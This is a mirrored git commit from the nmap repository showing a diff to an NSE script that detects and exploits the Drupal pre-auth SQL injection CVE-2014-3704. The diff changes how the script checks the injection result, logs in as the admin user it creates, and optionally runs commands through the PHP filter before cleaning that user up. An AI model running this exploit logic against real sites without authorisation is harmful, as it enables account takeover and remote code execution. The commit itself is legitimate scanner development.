PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-07 05:01:29 +00:00
Code Issues Projects Releases Wiki Activity

Improves detection of cve-2014-3704. Fixes #902. Closes #905.

Browse Source
This commit is contained in:
rewanth
2017-07-08 03:11:45 +00:00
parent d1e8388b7e
commit 30f0fab5bc
1 changed files with 44 additions and 29 deletions
Download Patch File Download Diff File Expand all files Collapse all files

55
scripts/http-vuln-cve2014-3704.nse
View File

@@ -216,9 +216,11 @@ local function do_sql_query(host, port, uri, user)
} }
} }
local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r) local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r)
--TODO: Check return status
if string.match(res.body, "includes[\\/]database[\\/]database%.inc") and string.match(res.body, "addcslashes%(%)") then
return user, passwd return user, passwd
end
end end
local function set_php_filter(host, port, uri, session, disable) local function set_php_filter(host, port, uri, session, disable)
@@ -342,28 +344,15 @@ action = function(host, port)
cleanup = "false" cleanup = "false"
end end
local user, passwd = do_sql_query(host, port, uri, nil)
stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
local data = {
['name'] = user,
['pass'] = passwd,
['form_id'] = 'user_login',
['op'] = 'Log in',
}
local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
if res.status == 302 and res.cookies[1].name ~= nil then
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port) local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = { local vuln = {
title = 'Drupal - pre Auth SQL Injection Vulnerability', title = 'Drupal - pre Auth SQL Injection Vulnerability',
state = vulns.STATE.NOT_VULN, state = vulns.STATE.NOT_VULN,
description = [[ description = [[
The expandArguments function in the database abstraction API in The expandArguments function in the database abstraction API in
Drupal core 7.x before 7.32 does not properly construct prepared Drupal core 7.x before 7.32 does not properly construct prepared
statements, which allows remote attackers to conduct SQL injection statements, which allows remote attackers to conduct SQL injection
attacks via an array containing crafted keys. attacks via an array containing crafted keys.
]], ]],
IDS = {CVE = 'CVE-2014-3704'}, IDS = {CVE = 'CVE-2014-3704'},
references = { references = {
@@ -375,9 +364,30 @@ attacks via an array containing crafted keys.
disclosure = {year = '2014', month = '10', day = '15'}, disclosure = {year = '2014', month = '10', day = '15'},
}, },
} }
stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
local user, passwd = do_sql_query(host, port, uri, nil)
if user == nil or passwd == nil then
return vulnReport:make_output(vuln)
end
stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
vuln.state = vulns.STATE.EXPLOIT vuln.state = vulns.STATE.EXPLOIT
local data = {
['name'] = user,
['pass'] = passwd,
['form_id'] = 'user_login',
['op'] = 'Log in',
}
local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
if res.status == 302 and res.cookies[1].name ~= nil then
stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
if cmd ~= nil then if cmd ~= nil then
local session = {} local session = {}
session.name = res.cookies[1].name session.name = res.cookies[1].name
@@ -406,11 +416,16 @@ attacks via an array containing crafted keys.
end end
end end
else
vuln.state = vulns.STATE.LIKELY_VULN
vuln.check_results = "Account created but unable to log in."
end
-- cleanup: remove admin user -- cleanup: remove admin user
if cleanup == nil then if cleanup == nil then
do_sql_query(host, port, uri, user) do_sql_query(host, port, uri, user)
end end
return vulnReport:make_output(vuln) return vulnReport:make_output(vuln)
end
end end